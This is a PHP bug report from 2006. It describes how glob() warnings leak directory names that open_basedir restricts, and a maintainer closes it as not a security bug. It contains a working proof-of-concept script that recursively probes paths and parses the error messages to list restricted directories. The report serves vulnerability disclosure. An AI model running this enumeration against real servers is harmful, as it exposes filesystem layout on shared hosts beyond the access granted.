ID: 39339 Updated by: [EMAIL PROTECTED] Reported By: anton dot kirsanov at gmail dot com -Status: Open +Status: Bogus Bug Type: Safe Mode/open_basedir Operating System: ALL PHP Version: 5.1.6 New Comment:
Thank you for taking the time to write to us, but this is not a bug. Please double-check the documentation available at http://www.php.net/manual/ and the instructions on how to report a bug at http://bugs.php.net/how-to-report.php Everytime PHP fails to open a file due to safe_mode/ open_basedir it returns an error saying cannot open so & so due to safe_mode. You don't gain the ability to write to files and/or open them, so there is no security issue here. Previous Comments: ------------------------------------------------------------------------ [2006-11-01 22:30:25] anton dot kirsanov at gmail dot com Description: ------------ When open_basedir is enabled, glob() function don`t show files in unallowed directories, however in warning message present file or directory name that access is denied. If you recursive parse a warning messages for extract pathes, you a get listing of unallowed directories (see POC code). I`m, tested this bug on PHP 5.1.6 and 4.4.4, everywhere the result is equal. Reproduce code: --------------- <?php // ----------------------------------------------------- // POC by Kirsanov Anton ( anton.kirsanov[at]gmail.com ) // // Description: // Bug in warning message for glob() function allow show listing unallowed directories when open_basedir is enabled. // // Risk: // Possible directory listing, when open_basedir is enabled. // Testing on PHP 4.4.4, 5.1.6. error_reporting(E_ALL); ini_set("display_errors", 0); ini_set("track_errors", 1); if(!ini_get('open_basedir')) die('open_basedir not present'); $chars = "._-1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; $z = array(); get_c("/", $z); // show contents of root directory print_r($z); function get_c($path, &$o) { global $chars; for($i=0; $i < strlen($chars); $i++) { $p = $path . $chars[$i]; $r = glob($p . "*"); if(!$r && $php_errormsg) { if(( preg_match("/open\_basedir restriction in effect\. File\((.*)\) is/iU", $php_errormsg, $t) || preg_match("/is not allowed to access (.*) owned/iU", $php_errormsg, $t)) && !$o[$t[1]]) { $o[$t[1]] = $t[2]; get_c($p, $o); } } } } ?> Expected result: ---------------- <?php glob("/*"); ?> Warning: glob(): open_basedir restriction in effect. is not allowed to access (/) owned ... Actual result: -------------- <?php glob("/*"); ?> ---- Warning: glob(): open_basedir restriction in effect. is not allowed to access (/bin/) owned ... ---- Warning message has been disclose path - /bin/ ------------------------------------------------------------------------ -- Edit this bug report at http://bugs.php.net/?id=39339&edit=1
